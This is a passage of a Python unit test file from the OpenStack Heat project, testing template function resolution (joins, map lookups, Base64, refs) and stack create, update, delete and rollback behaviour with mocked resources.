Triv90/Heat | heat/tests/test_parser.py | 1 | 49333 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import unittest
from nose.plugins.attrib import attr
import mox
import uuid
from heat.common import context
from heat.common import exception
from heat.common import template_format
from heat.engine import resource
from heat.engine import parser
from heat.engine import parameters
from heat.engine import template
from heat.tests.utils import stack_delete_after
from heat.tests import generic_resource as generic_rsrc
import heat.db as db_api
def join(raw):
return parser.Template.resolve_joins(raw)
@attr(tag=['unit', 'parser'])
@attr(speed='fast')
class ParserTest(unittest.TestCase):
def test_list(self):
raw = ['foo', 'bar', 'baz']
parsed = join(raw)
for i in xrange(len(raw)):
self.assertEqual(parsed[i], raw[i])
self.assertTrue(parsed is not raw)
def test_dict(self):
raw = {'foo': 'bar', 'blarg': 'wibble'}
parsed = join(raw)
for k in raw:
self.assertEqual(parsed[k], raw[k])
self.assertTrue(parsed is not raw)
def test_dict_list(self):
raw = {'foo': ['bar', 'baz'], 'blarg': 'wibble'}
parsed = join(raw)
self.assertEqual(parsed['blarg'], raw['blarg'])
for i in xrange(len(raw['foo'])):
self.assertEqual(parsed['foo'][i], raw['foo'][i])
self.assertTrue(parsed is not raw)
self.assertTrue(parsed['foo'] is not raw['foo'])
def test_list_dict(self):
raw = [{'foo': 'bar', 'blarg': 'wibble'}, 'baz', 'quux']
parsed = join(raw)
for i in xrange(1, len(raw)):
self.assertEqual(parsed[i], raw[i])
for k in raw[0]:
self.assertEqual(parsed[0][k], raw[0][k])
self.assertTrue(parsed is not raw)
self.assertTrue(parsed[0] is not raw[0])
def test_join(self):
raw = {'Fn::Join': [' ', ['foo', 'bar', 'baz']]}
self.assertEqual(join(raw), 'foo bar baz')
def test_join_none(self):
raw = {'Fn::Join': [' ', ['foo', None, 'baz']]}
self.assertEqual(join(raw), 'foo baz')
def test_join_list(self):
raw = [{'Fn::Join': [' ', ['foo', 'bar', 'baz']]}, 'blarg', 'wibble']
parsed = join(raw)
self.assertEqual(parsed[0], 'foo bar baz')
for i in xrange(1, len(raw)):
self.assertEqual(parsed[i], raw[i])
self.assertTrue(parsed is not raw)
def test_join_dict_val(self):
raw = {'quux': {'Fn::Join': [' ', ['foo', 'bar', 'baz']]},
'blarg': 'wibble'}
parsed = join(raw)
self.assertEqual(parsed['quux'], 'foo bar baz')
self.assertEqual(parsed['blarg'], raw['blarg'])
self.assertTrue(parsed is not raw)
def test_join_recursive(self):
raw = {'Fn::Join': ['\n', [{'Fn::Join':
[' ', ['foo', 'bar']]}, 'baz']]}
self.assertEqual(join(raw), 'foo bar\nbaz')
mapping_template = template_format.parse('''{
"Mappings" : {
"ValidMapping" : {
"TestKey" : { "TestValue" : "wibble" }
},
"InvalidMapping" : {
"ValueList" : [ "foo", "bar" ],
"ValueString" : "baz"
},
"MapList": [ "foo", { "bar" : "baz" } ],
"MapString": "foobar"
}
}''')
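# For reference (added comment): given the mapping above, a snippet such as
#     {'Fn::FindInMap': ['ValidMapping', 'TestKey', 'TestValue']}
# is expected to resolve to 'wibble'; the InvalidMapping/MapList/MapString
# entries exist only to exercise the error paths in the tests below.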
@attr(tag=['unit', 'parser', 'template'])
@attr(speed='fast')
class TemplateTest(unittest.TestCase):
def setUp(self):
self.m = mox.Mox()
def tearDown(self):
self.m.UnsetStubs()
def test_defaults(self):
empty = parser.Template({})
try:
empty[template.VERSION]
except KeyError:
pass
else:
self.fail('Expected KeyError for version not present')
self.assertEqual(empty[template.DESCRIPTION], 'No description')
self.assertEqual(empty[template.MAPPINGS], {})
self.assertEqual(empty[template.PARAMETERS], {})
self.assertEqual(empty[template.RESOURCES], {})
self.assertEqual(empty[template.OUTPUTS], {})
def test_invalid_section(self):
tmpl = parser.Template({'Foo': ['Bar']})
try:
tmpl['Foo']
except KeyError:
pass
else:
self.fail('Expected KeyError for invalid template key')
def test_find_in_map(self):
tmpl = parser.Template(mapping_template)
find = {'Fn::FindInMap': ["ValidMapping", "TestKey", "TestValue"]}
self.assertEqual(tmpl.resolve_find_in_map(find), "wibble")
def test_find_in_invalid_map(self):
tmpl = parser.Template(mapping_template)
finds = ({'Fn::FindInMap': ["InvalidMapping", "ValueList", "foo"]},
{'Fn::FindInMap': ["InvalidMapping", "ValueString", "baz"]},
{'Fn::FindInMap': ["MapList", "foo", "bar"]},
{'Fn::FindInMap': ["MapString", "foo", "bar"]})
for find in finds:
self.assertRaises(KeyError, tmpl.resolve_find_in_map, find)
def test_bad_find_in_map(self):
tmpl = parser.Template(mapping_template)
finds = ({'Fn::FindInMap': "String"},
{'Fn::FindInMap': {"Dict": "String"}},
{'Fn::FindInMap': ["ShortList", "foo"]},
{'Fn::FindInMap': ["ReallyShortList"]})
for find in finds:
self.assertRaises(KeyError, tmpl.resolve_find_in_map, find)
def test_param_refs(self):
params = {'foo': 'bar', 'blarg': 'wibble'}
p_snippet = {"Ref": "foo"}
self.assertEqual(parser.Template.resolve_param_refs(p_snippet, params),
"bar")
def test_param_refs_resource(self):
params = {'foo': 'bar', 'blarg': 'wibble'}
r_snippet = {"Ref": "baz"}
self.assertEqual(parser.Template.resolve_param_refs(r_snippet, params),
r_snippet)
def test_param_ref_missing(self):
tmpl = {'Parameters': {'foo': {'Type': 'String', 'Required': True}}}
params = parameters.Parameters('test', tmpl)
snippet = {"Ref": "foo"}
self.assertRaises(exception.UserParameterMissing,
parser.Template.resolve_param_refs,
snippet, params)
def test_resource_refs(self):
resources = {'foo': self.m.CreateMock(resource.Resource),
'blarg': self.m.CreateMock(resource.Resource)}
resources['foo'].FnGetRefId().AndReturn('bar')
self.m.ReplayAll()
r_snippet = {"Ref": "foo"}
self.assertEqual(parser.Template.resolve_resource_refs(r_snippet,
resources),
"bar")
self.m.VerifyAll()
def test_resource_refs_param(self):
resources = {'foo': 'bar', 'blarg': 'wibble'}
p_snippet = {"Ref": "baz"}
self.assertEqual(parser.Template.resolve_resource_refs(p_snippet,
resources),
p_snippet)
def test_join_reduce(self):
join = {"Fn::Join": [" ", ["foo", "bar", "baz", {'Ref': 'baz'},
"bink", "bonk"]]}
self.assertEqual(
parser.Template.reduce_joins(join),
{"Fn::Join": [" ", ["foo bar baz", {'Ref': 'baz'}, "bink bonk"]]})
join = {"Fn::Join": [" ", ["foo", {'Ref': 'baz'},
"bink"]]}
self.assertEqual(
parser.Template.reduce_joins(join),
{"Fn::Join": [" ", ["foo", {'Ref': 'baz'}, "bink"]]})
join = {"Fn::Join": [" ", [{'Ref': 'baz'}]]}
self.assertEqual(
parser.Template.reduce_joins(join),
{"Fn::Join": [" ", [{'Ref': 'baz'}]]})
def test_join(self):
join = {"Fn::Join": [" ", ["foo", "bar"]]}
self.assertEqual(parser.Template.resolve_joins(join), "foo bar")
def test_join_string(self):
join = {"Fn::Join": [" ", "foo"]}
self.assertRaises(TypeError, parser.Template.resolve_joins,
join)
def test_join_dict(self):
join = {"Fn::Join": [" ", {"foo": "bar"}]}
self.assertRaises(TypeError, parser.Template.resolve_joins,
join)
def test_join_wrong_num_args(self):
join0 = {"Fn::Join": []}
self.assertRaises(ValueError, parser.Template.resolve_joins,
join0)
join1 = {"Fn::Join": [" "]}
self.assertRaises(ValueError, parser.Template.resolve_joins,
join1)
join3 = {"Fn::Join": [" ", {"foo": "bar"}, ""]}
self.assertRaises(ValueError, parser.Template.resolve_joins,
join3)
def test_join_string_nodelim(self):
join1 = {"Fn::Join": "o"}
self.assertRaises(TypeError, parser.Template.resolve_joins,
join1)
join2 = {"Fn::Join": "oh"}
self.assertRaises(TypeError, parser.Template.resolve_joins,
join2)
join3 = {"Fn::Join": "ohh"}
self.assertRaises(TypeError, parser.Template.resolve_joins,
join3)
def test_join_dict_nodelim(self):
join1 = {"Fn::Join": {"foo": "bar"}}
self.assertRaises(TypeError, parser.Template.resolve_joins,
join1)
join2 = {"Fn::Join": {"foo": "bar", "blarg": "wibble"}}
self.assertRaises(TypeError, parser.Template.resolve_joins,
join2)
join3 = {"Fn::Join": {"foo": "bar", "blarg": "wibble", "baz": "quux"}}
self.assertRaises(TypeError, parser.Template.resolve_joins,
join3)
def test_base64(self):
snippet = {"Fn::Base64": "foobar"}
# For now, the Base64 function just returns the original text, and
# does not convert to base64 (see issue #133)
self.assertEqual(parser.Template.resolve_base64(snippet), "foobar")
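        # If encoding were actually performed, a sketch (hypothetical, not
        # current behaviour) would look like:
        #     base64.b64encode('foobar'.encode('utf-8')) == b'Zm9vYmFy'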
def test_base64_list(self):
list_snippet = {"Fn::Base64": ["foobar"]}
self.assertRaises(TypeError, parser.Template.resolve_base64,
list_snippet)
def test_base64_dict(self):
dict_snippet = {"Fn::Base64": {"foo": "bar"}}
self.assertRaises(TypeError, parser.Template.resolve_base64,
dict_snippet)
@attr(tag=['unit', 'parser', 'stack'])
@attr(speed='fast')
class StackTest(unittest.TestCase):
def setUp(self):
self.username = 'parser_stack_test_user'
self.m = mox.Mox()
self.ctx = context.get_admin_context()
self.m.StubOutWithMock(self.ctx, 'username')
self.ctx.username = self.username
self.ctx.tenant_id = 'test_tenant'
generic_rsrc.GenericResource.properties_schema = {}
resource._register_class('GenericResourceType',
generic_rsrc.GenericResource)
self.m.ReplayAll()
def tearDown(self):
self.m.UnsetStubs()
def test_state_defaults(self):
stack = parser.Stack(None, 'test_stack', parser.Template({}))
self.assertEqual(stack.state, None)
self.assertEqual(stack.state_description, '')
def test_state(self):
stack = parser.Stack(None, 'test_stack', parser.Template({}),
state='foo')
self.assertEqual(stack.state, 'foo')
stack.state_set('bar', '')
self.assertEqual(stack.state, 'bar')
def test_state_description(self):
stack = parser.Stack(None, 'test_stack', parser.Template({}),
state_description='quux')
self.assertEqual(stack.state_description, 'quux')
stack.state_set('blarg', 'wibble')
self.assertEqual(stack.state_description, 'wibble')
def test_load_nonexistant_id(self):
self.assertRaises(exception.NotFound, parser.Stack.load,
None, -1)
    # Note: tests creating a stack should be decorated with
    # @stack_delete_after to ensure self.stack is properly cleaned up
@stack_delete_after
def test_identifier(self):
self.stack = parser.Stack(self.ctx, 'identifier_test',
parser.Template({}))
self.stack.store()
identifier = self.stack.identifier()
self.assertEqual(identifier.tenant, self.ctx.tenant_id)
self.assertEqual(identifier.stack_name, 'identifier_test')
self.assertTrue(identifier.stack_id)
self.assertFalse(identifier.path)
@stack_delete_after
def test_set_param_id(self):
dummy_stackid = 'STACKABCD1234'
self.m.StubOutWithMock(uuid, 'uuid4')
uuid.uuid4().AndReturn(dummy_stackid)
self.m.ReplayAll()
self.stack = parser.Stack(self.ctx, 'param_arn_test',
parser.Template({}))
exp_prefix = 'arn:openstack:heat::test_tenant:stacks/param_arn_test/'
self.assertEqual(self.stack.parameters['AWS::StackId'],
exp_prefix + 'None')
self.stack.store()
identifier = self.stack.identifier()
self.assertEqual(self.stack.parameters['AWS::StackId'],
exp_prefix + dummy_stackid)
self.assertEqual(self.stack.parameters['AWS::StackId'],
identifier.arn())
self.m.VerifyAll()
@stack_delete_after
def test_load_param_id(self):
self.stack = parser.Stack(self.ctx, 'param_load_arn_test',
parser.Template({}))
self.stack.store()
identifier = self.stack.identifier()
self.assertEqual(self.stack.parameters['AWS::StackId'],
identifier.arn())
newstack = parser.Stack.load(self.ctx, stack_id=self.stack.id)
self.assertEqual(newstack.parameters['AWS::StackId'], identifier.arn())
@stack_delete_after
def test_created_time(self):
self.stack = parser.Stack(self.ctx, 'creation_time_test',
parser.Template({}))
self.assertEqual(self.stack.created_time, None)
self.stack.store()
self.assertNotEqual(self.stack.created_time, None)
@stack_delete_after
def test_updated_time(self):
self.stack = parser.Stack(self.ctx, 'update_time_test',
parser.Template({}))
self.assertEqual(self.stack.updated_time, None)
self.stack.store()
stored_time = self.stack.updated_time
self.stack.state_set(self.stack.CREATE_IN_PROGRESS, 'testing')
self.assertNotEqual(self.stack.updated_time, None)
self.assertNotEqual(self.stack.updated_time, stored_time)
@stack_delete_after
def test_delete(self):
self.stack = parser.Stack(self.ctx, 'delete_test',
parser.Template({}))
stack_id = self.stack.store()
db_s = db_api.stack_get(self.ctx, stack_id)
self.assertNotEqual(db_s, None)
self.stack.delete()
db_s = db_api.stack_get(self.ctx, stack_id)
self.assertEqual(db_s, None)
self.assertEqual(self.stack.state, self.stack.DELETE_COMPLETE)
@stack_delete_after
def test_delete_rollback(self):
self.stack = parser.Stack(self.ctx, 'delete_rollback_test',
parser.Template({}), disable_rollback=False)
stack_id = self.stack.store()
db_s = db_api.stack_get(self.ctx, stack_id)
self.assertNotEqual(db_s, None)
self.stack.delete(action=self.stack.ROLLBACK)
db_s = db_api.stack_get(self.ctx, stack_id)
self.assertEqual(db_s, None)
self.assertEqual(self.stack.state, self.stack.ROLLBACK_COMPLETE)
@stack_delete_after
def test_delete_badaction(self):
self.stack = parser.Stack(self.ctx, 'delete_badaction_test',
parser.Template({}))
stack_id = self.stack.store()
db_s = db_api.stack_get(self.ctx, stack_id)
self.assertNotEqual(db_s, None)
self.stack.delete(action="wibble")
db_s = db_api.stack_get(self.ctx, stack_id)
self.assertNotEqual(db_s, None)
self.assertEqual(self.stack.state, self.stack.DELETE_FAILED)
@stack_delete_after
def test_update_badstate(self):
self.stack = parser.Stack(self.ctx, 'test_stack', parser.Template({}),
state=parser.Stack.CREATE_FAILED)
stack_id = self.stack.store()
self.assertEqual(self.stack.state, parser.Stack.CREATE_FAILED)
self.stack.update({})
self.assertEqual(self.stack.state, parser.Stack.UPDATE_FAILED)
@stack_delete_after
def test_resource_by_refid(self):
tmpl = {'Resources': {'AResource': {'Type': 'GenericResourceType'}}}
self.stack = parser.Stack(self.ctx, 'resource_by_refid_stack',
template.Template(tmpl))
self.stack.store()
self.stack.create()
self.assertEqual(self.stack.state, parser.Stack.CREATE_COMPLETE)
self.assertTrue('AResource' in self.stack)
resource = self.stack['AResource']
resource.resource_id_set('aaaa')
self.assertNotEqual(None, resource)
self.assertEqual(resource, self.stack.resource_by_refid('aaaa'))
resource.state = resource.DELETE_IN_PROGRESS
self.assertEqual(None, self.stack.resource_by_refid('aaaa'))
self.assertEqual(None, self.stack.resource_by_refid('bbbb'))
@stack_delete_after
def test_update_add(self):
tmpl = {'Resources': {'AResource': {'Type': 'GenericResourceType'}}}
self.stack = parser.Stack(self.ctx, 'update_test_stack',
template.Template(tmpl))
self.stack.store()
self.stack.create()
self.assertEqual(self.stack.state, parser.Stack.CREATE_COMPLETE)
tmpl2 = {'Resources': {
'AResource': {'Type': 'GenericResourceType'},
'BResource': {'Type': 'GenericResourceType'}}}
updated_stack = parser.Stack(self.ctx, 'updated_stack',
template.Template(tmpl2))
self.stack.update(updated_stack)
self.assertEqual(self.stack.state, parser.Stack.UPDATE_COMPLETE)
self.assertTrue('BResource' in self.stack)
@stack_delete_after
def test_update_remove(self):
tmpl = {'Resources': {
'AResource': {'Type': 'GenericResourceType'},
'BResource': {'Type': 'GenericResourceType'}}}
self.stack = parser.Stack(self.ctx, 'update_test_stack',
template.Template(tmpl))
self.stack.store()
self.stack.create()
self.assertEqual(self.stack.state, parser.Stack.CREATE_COMPLETE)
tmpl2 = {'Resources': {'AResource': {'Type': 'GenericResourceType'}}}
updated_stack = parser.Stack(self.ctx, 'updated_stack',
template.Template(tmpl2))
self.stack.update(updated_stack)
self.assertEqual(self.stack.state, parser.Stack.UPDATE_COMPLETE)
self.assertFalse('BResource' in self.stack)
@stack_delete_after
def test_update_description(self):
tmpl = {'Description': 'ATemplate',
'Resources': {'AResource': {'Type': 'GenericResourceType'}}}
self.stack = parser.Stack(self.ctx, 'update_test_stack',
template.Template(tmpl))
self.stack.store()
self.stack.create()
self.assertEqual(self.stack.state, parser.Stack.CREATE_COMPLETE)
tmpl2 = {'Description': 'BTemplate',
'Resources': {'AResource': {'Type': 'GenericResourceType'}}}
updated_stack = parser.Stack(self.ctx, 'updated_stack',
template.Template(tmpl2))
self.stack.update(updated_stack)
self.assertEqual(self.stack.state, parser.Stack.UPDATE_COMPLETE)
self.assertEqual(self.stack.t[template.DESCRIPTION], 'BTemplate')
@stack_delete_after
def test_update_modify_ok_replace(self):
# patch in a dummy property schema for GenericResource
dummy_schema = {'Foo': {'Type': 'String'}}
generic_rsrc.GenericResource.properties_schema = dummy_schema
tmpl = {'Resources': {'AResource': {'Type': 'GenericResourceType',
'Properties': {'Foo': 'abc'}}}}
self.stack = parser.Stack(self.ctx, 'update_test_stack',
template.Template(tmpl))
self.stack.store()
self.stack.create()
self.assertEqual(self.stack.state, parser.Stack.CREATE_COMPLETE)
tmpl2 = {'Resources': {'AResource': {'Type': 'GenericResourceType',
'Properties': {'Foo': 'xyz'}}}}
updated_stack = parser.Stack(self.ctx, 'updated_stack',
template.Template(tmpl2))
# patch in a dummy handle_update
self.m.StubOutWithMock(generic_rsrc.GenericResource, 'handle_update')
generic_rsrc.GenericResource.handle_update(
tmpl2['Resources']['AResource']).AndReturn(
resource.Resource.UPDATE_REPLACE)
self.m.ReplayAll()
self.stack.update(updated_stack)
self.assertEqual(self.stack.state, parser.Stack.UPDATE_COMPLETE)
self.assertEqual(self.stack['AResource'].properties['Foo'], 'xyz')
self.m.VerifyAll()
@stack_delete_after
def test_update_modify_update_failed(self):
# patch in a dummy property schema for GenericResource
dummy_schema = {'Foo': {'Type': 'String'}}
generic_rsrc.GenericResource.properties_schema = dummy_schema
tmpl = {'Resources': {'AResource': {'Type': 'GenericResourceType',
'Properties': {'Foo': 'abc'}}}}
self.stack = parser.Stack(self.ctx, 'update_test_stack',
template.Template(tmpl),
disable_rollback=True)
self.stack.store()
self.stack.create()
self.assertEqual(self.stack.state, parser.Stack.CREATE_COMPLETE)
tmpl2 = {'Resources': {'AResource': {'Type': 'GenericResourceType',
'Properties': {'Foo': 'xyz'}}}}
updated_stack = parser.Stack(self.ctx, 'updated_stack',
template.Template(tmpl2))
# patch in a dummy handle_update
self.m.StubOutWithMock(generic_rsrc.GenericResource, 'handle_update')
generic_rsrc.GenericResource.handle_update(
tmpl2['Resources']['AResource']).AndReturn(
resource.Resource.UPDATE_FAILED)
self.m.ReplayAll()
self.stack.update(updated_stack)
self.assertEqual(self.stack.state, parser.Stack.UPDATE_FAILED)
self.m.VerifyAll()
@stack_delete_after
def test_update_modify_replace_failed_delete(self):
# patch in a dummy property schema for GenericResource
dummy_schema = {'Foo': {'Type': 'String'}}
generic_rsrc.GenericResource.properties_schema = dummy_schema
tmpl = {'Resources': {'AResource': {'Type': 'GenericResourceType',
'Properties': {'Foo': 'abc'}}}}
self.stack = parser.Stack(self.ctx, 'update_test_stack',
template.Template(tmpl),
disable_rollback=True)
self.stack.store()
self.stack.create()
self.assertEqual(self.stack.state, parser.Stack.CREATE_COMPLETE)
tmpl2 = {'Resources': {'AResource': {'Type': 'GenericResourceType',
'Properties': {'Foo': 'xyz'}}}}
updated_stack = parser.Stack(self.ctx, 'updated_stack',
template.Template(tmpl2))
# patch in a dummy handle_update
self.m.StubOutWithMock(generic_rsrc.GenericResource, 'handle_update')
generic_rsrc.GenericResource.handle_update(
tmpl2['Resources']['AResource']).AndReturn(
resource.Resource.UPDATE_REPLACE)
        # make the update fail when deleting the existing resource
self.m.StubOutWithMock(resource.Resource, 'destroy')
resource.Resource.destroy().AndReturn("Error")
self.m.ReplayAll()
self.stack.update(updated_stack)
self.assertEqual(self.stack.state, parser.Stack.UPDATE_FAILED)
self.m.VerifyAll()
# Unset here so destroy() is not stubbed for stack.delete cleanup
self.m.UnsetStubs()
@stack_delete_after
def test_update_modify_replace_failed_create(self):
# patch in a dummy property schema for GenericResource
dummy_schema = {'Foo': {'Type': 'String'}}
generic_rsrc.GenericResource.properties_schema = dummy_schema
tmpl = {'Resources': {'AResource': {'Type': 'GenericResourceType',
'Properties': {'Foo': 'abc'}}}}
self.stack = parser.Stack(self.ctx, 'update_test_stack',
template.Template(tmpl),
disable_rollback=True)
self.stack.store()
self.stack.create()
self.assertEqual(self.stack.state, parser.Stack.CREATE_COMPLETE)
tmpl2 = {'Resources': {'AResource': {'Type': 'GenericResourceType',
'Properties': {'Foo': 'xyz'}}}}
updated_stack = parser.Stack(self.ctx, 'updated_stack',
template.Template(tmpl2))
# patch in a dummy handle_update
self.m.StubOutWithMock(generic_rsrc.GenericResource, 'handle_update')
generic_rsrc.GenericResource.handle_update(
tmpl2['Resources']['AResource']).AndReturn(
resource.Resource.UPDATE_REPLACE)
        # patch in a dummy handle_create making the replacement creation fail
self.m.StubOutWithMock(generic_rsrc.GenericResource, 'handle_create')
generic_rsrc.GenericResource.handle_create().AndRaise(Exception)
self.m.ReplayAll()
self.stack.update(updated_stack)
self.assertEqual(self.stack.state, parser.Stack.UPDATE_FAILED)
self.m.VerifyAll()
@stack_delete_after
def test_update_add_failed_create(self):
tmpl = {'Resources': {'AResource': {'Type': 'GenericResourceType'}}}
self.stack = parser.Stack(self.ctx, 'update_test_stack',
template.Template(tmpl))
self.stack.store()
self.stack.create()
self.assertEqual(self.stack.state, parser.Stack.CREATE_COMPLETE)
tmpl2 = {'Resources': {
'AResource': {'Type': 'GenericResourceType'},
'BResource': {'Type': 'GenericResourceType'}}}
updated_stack = parser.Stack(self.ctx, 'updated_stack',
template.Template(tmpl2))
        # patch in a dummy handle_create making the creation of BResource fail
self.m.StubOutWithMock(generic_rsrc.GenericResource, 'handle_create')
generic_rsrc.GenericResource.handle_create().AndRaise(Exception)
self.m.ReplayAll()
self.stack.update(updated_stack)
self.assertEqual(self.stack.state, parser.Stack.UPDATE_FAILED)
self.assertTrue('BResource' in self.stack)
# Reload the stack from the DB and prove that it contains the failed
# resource (to ensure it will be deleted on stack delete)
re_stack = parser.Stack.load(self.ctx, stack_id=self.stack.id)
self.assertTrue('BResource' in re_stack)
self.m.VerifyAll()
@stack_delete_after
def test_update_rollback(self):
# patch in a dummy property schema for GenericResource
dummy_schema = {'Foo': {'Type': 'String'}}
generic_rsrc.GenericResource.properties_schema = dummy_schema
tmpl = {'Resources': {'AResource': {'Type': 'GenericResourceType',
'Properties': {'Foo': 'abc'}}}}
self.stack = parser.Stack(self.ctx, 'update_test_stack',
template.Template(tmpl),
disable_rollback=False)
self.stack.store()
self.stack.create()
self.assertEqual(self.stack.state, parser.Stack.CREATE_COMPLETE)
tmpl2 = {'Resources': {'AResource': {'Type': 'GenericResourceType',
'Properties': {'Foo': 'xyz'}}}}
updated_stack = parser.Stack(self.ctx, 'updated_stack',
template.Template(tmpl2))
# There will be two calls to handle_update, one for the new template
# then another (with the initial template) for rollback
self.m.StubOutWithMock(generic_rsrc.GenericResource, 'handle_update')
generic_rsrc.GenericResource.handle_update(
tmpl2['Resources']['AResource']).AndReturn(
resource.Resource.UPDATE_REPLACE)
generic_rsrc.GenericResource.handle_update(
tmpl['Resources']['AResource']).AndReturn(
resource.Resource.UPDATE_REPLACE)
# patch in a dummy handle_create making the replace fail when creating
        # the replacement resource, but succeed on the second call (rollback)
self.m.StubOutWithMock(generic_rsrc.GenericResource, 'handle_create')
generic_rsrc.GenericResource.handle_create().AndRaise(Exception)
generic_rsrc.GenericResource.handle_create().AndReturn(None)
self.m.ReplayAll()
self.stack.update(updated_stack)
self.assertEqual(self.stack.state, parser.Stack.ROLLBACK_COMPLETE)
self.assertEqual(self.stack['AResource'].properties['Foo'], 'abc')
self.m.VerifyAll()
@stack_delete_after
def test_update_rollback_fail(self):
# patch in a dummy property schema for GenericResource
dummy_schema = {'Foo': {'Type': 'String'}}
generic_rsrc.GenericResource.properties_schema = dummy_schema
tmpl = {'Resources': {'AResource': {'Type': 'GenericResourceType',
'Properties': {'Foo': 'abc'}}}}
self.stack = parser.Stack(self.ctx, 'update_test_stack',
template.Template(tmpl),
disable_rollback=False)
self.stack.store()
self.stack.create()
self.assertEqual(self.stack.state, parser.Stack.CREATE_COMPLETE)
tmpl2 = {'Resources': {'AResource': {'Type': 'GenericResourceType',
'Properties': {'Foo': 'xyz'}}}}
updated_stack = parser.Stack(self.ctx, 'updated_stack',
template.Template(tmpl2))
# There will be two calls to handle_update, one for the new template
# then another (with the initial template) for rollback
self.m.StubOutWithMock(generic_rsrc.GenericResource, 'handle_update')
generic_rsrc.GenericResource.handle_update(
tmpl2['Resources']['AResource']).AndReturn(
resource.Resource.UPDATE_REPLACE)
generic_rsrc.GenericResource.handle_update(
tmpl['Resources']['AResource']).AndReturn(
resource.Resource.UPDATE_REPLACE)
# patch in a dummy handle_create making the replace fail when creating
# the replacement resource, and again on the second call (rollback)
self.m.StubOutWithMock(generic_rsrc.GenericResource, 'handle_create')
generic_rsrc.GenericResource.handle_create().AndRaise(Exception)
generic_rsrc.GenericResource.handle_create().AndRaise(Exception)
self.m.ReplayAll()
self.stack.update(updated_stack)
self.assertEqual(self.stack.state, parser.Stack.ROLLBACK_FAILED)
self.m.VerifyAll()
@stack_delete_after
def test_update_rollback_add(self):
tmpl = {'Resources': {'AResource': {'Type': 'GenericResourceType'}}}
self.stack = parser.Stack(self.ctx, 'update_test_stack',
template.Template(tmpl),
disable_rollback=False)
self.stack.store()
self.stack.create()
self.assertEqual(self.stack.state, parser.Stack.CREATE_COMPLETE)
tmpl2 = {'Resources': {
'AResource': {'Type': 'GenericResourceType'},
'BResource': {'Type': 'GenericResourceType'}}}
updated_stack = parser.Stack(self.ctx, 'updated_stack',
template.Template(tmpl2))
        # patch in a dummy handle_create making creation of the added
        # BResource fail; rollback then removes it from the stack again
self.m.StubOutWithMock(generic_rsrc.GenericResource, 'handle_create')
generic_rsrc.GenericResource.handle_create().AndRaise(Exception)
self.m.ReplayAll()
self.stack.update(updated_stack)
self.assertEqual(self.stack.state, parser.Stack.ROLLBACK_COMPLETE)
self.assertFalse('BResource' in self.stack)
self.m.VerifyAll()
@stack_delete_after
def test_update_rollback_remove(self):
tmpl = {'Resources': {
'AResource': {'Type': 'GenericResourceType'},
'BResource': {'Type': 'GenericResourceType'}}}
self.stack = parser.Stack(self.ctx, 'update_test_stack',
template.Template(tmpl),
disable_rollback=False)
self.stack.store()
self.stack.create()
self.assertEqual(self.stack.state, parser.Stack.CREATE_COMPLETE)
tmpl2 = {'Resources': {'AResource': {'Type': 'GenericResourceType'}}}
updated_stack = parser.Stack(self.ctx, 'updated_stack',
template.Template(tmpl2))
# patch in a dummy destroy making the delete fail
self.m.StubOutWithMock(resource.Resource, 'destroy')
resource.Resource.destroy().AndReturn('Error')
self.m.ReplayAll()
self.stack.update(updated_stack)
self.assertEqual(self.stack.state, parser.Stack.ROLLBACK_COMPLETE)
self.assertTrue('BResource' in self.stack)
self.m.VerifyAll()
# Unset here so destroy() is not stubbed for stack.delete cleanup
self.m.UnsetStubs()
@stack_delete_after
def test_update_replace_by_reference(self):
        '''
        assertion:
        changes in dynamic attributes, due to other resources being
        updated, are not ignored and can cause dependent resources to be
        updated.
        '''
# patch in a dummy property schema for GenericResource
dummy_schema = {'Foo': {'Type': 'String'}}
generic_rsrc.GenericResource.properties_schema = dummy_schema
tmpl = {'Resources': {
'AResource': {'Type': 'GenericResourceType',
'Properties': {'Foo': 'abc'}},
'BResource': {'Type': 'GenericResourceType',
'Properties': {
'Foo': {'Ref': 'AResource'}}}}}
tmpl2 = {'Resources': {
'AResource': {'Type': 'GenericResourceType',
'Properties': {'Foo': 'smelly'}},
'BResource': {'Type': 'GenericResourceType',
'Properties': {
'Foo': {'Ref': 'AResource'}}}}}
self.stack = parser.Stack(self.ctx, 'update_test_stack',
template.Template(tmpl))
self.stack.store()
self.stack.create()
self.assertEqual(self.stack.state, parser.Stack.CREATE_COMPLETE)
self.assertEqual(self.stack['AResource'].properties['Foo'], 'abc')
self.assertEqual(self.stack['BResource'].properties['Foo'],
'AResource')
self.m.StubOutWithMock(generic_rsrc.GenericResource, 'handle_update')
generic_rsrc.GenericResource.handle_update(
tmpl2['Resources']['AResource']).AndReturn(
resource.Resource.UPDATE_REPLACE)
br2_snip = {'Type': 'GenericResourceType',
'Properties': {'Foo': 'inst-007'}}
generic_rsrc.GenericResource.handle_update(
br2_snip).AndReturn(
resource.Resource.UPDATE_REPLACE)
self.m.StubOutWithMock(generic_rsrc.GenericResource, 'FnGetRefId')
generic_rsrc.GenericResource.FnGetRefId().AndReturn(
'AResource')
generic_rsrc.GenericResource.FnGetRefId().MultipleTimes().AndReturn(
'inst-007')
self.m.ReplayAll()
updated_stack = parser.Stack(self.ctx, 'updated_stack',
template.Template(tmpl2))
self.stack.update(updated_stack)
self.assertEqual(self.stack.state, parser.Stack.UPDATE_COMPLETE)
self.assertEqual(self.stack['AResource'].properties['Foo'], 'smelly')
self.assertEqual(self.stack['BResource'].properties['Foo'], 'inst-007')
self.m.VerifyAll()
@stack_delete_after
def test_update_by_reference_and_rollback_1(self):
        '''
        assertion:
        check that rollback still works with dynamic metadata.
        This test fails the first instance.
        '''
# patch in a dummy property schema for GenericResource
dummy_schema = {'Foo': {'Type': 'String'}}
generic_rsrc.GenericResource.properties_schema = dummy_schema
tmpl = {'Resources': {
'AResource': {'Type': 'GenericResourceType',
'Properties': {'Foo': 'abc'}},
'BResource': {'Type': 'GenericResourceType',
'Properties': {
'Foo': {'Ref': 'AResource'}}}}}
tmpl2 = {'Resources': {
'AResource': {'Type': 'GenericResourceType',
'Properties': {'Foo': 'smelly'}},
'BResource': {'Type': 'GenericResourceType',
'Properties': {
'Foo': {'Ref': 'AResource'}}}}}
self.stack = parser.Stack(self.ctx, 'update_test_stack',
template.Template(tmpl),
disable_rollback=False)
self.stack.store()
self.stack.create()
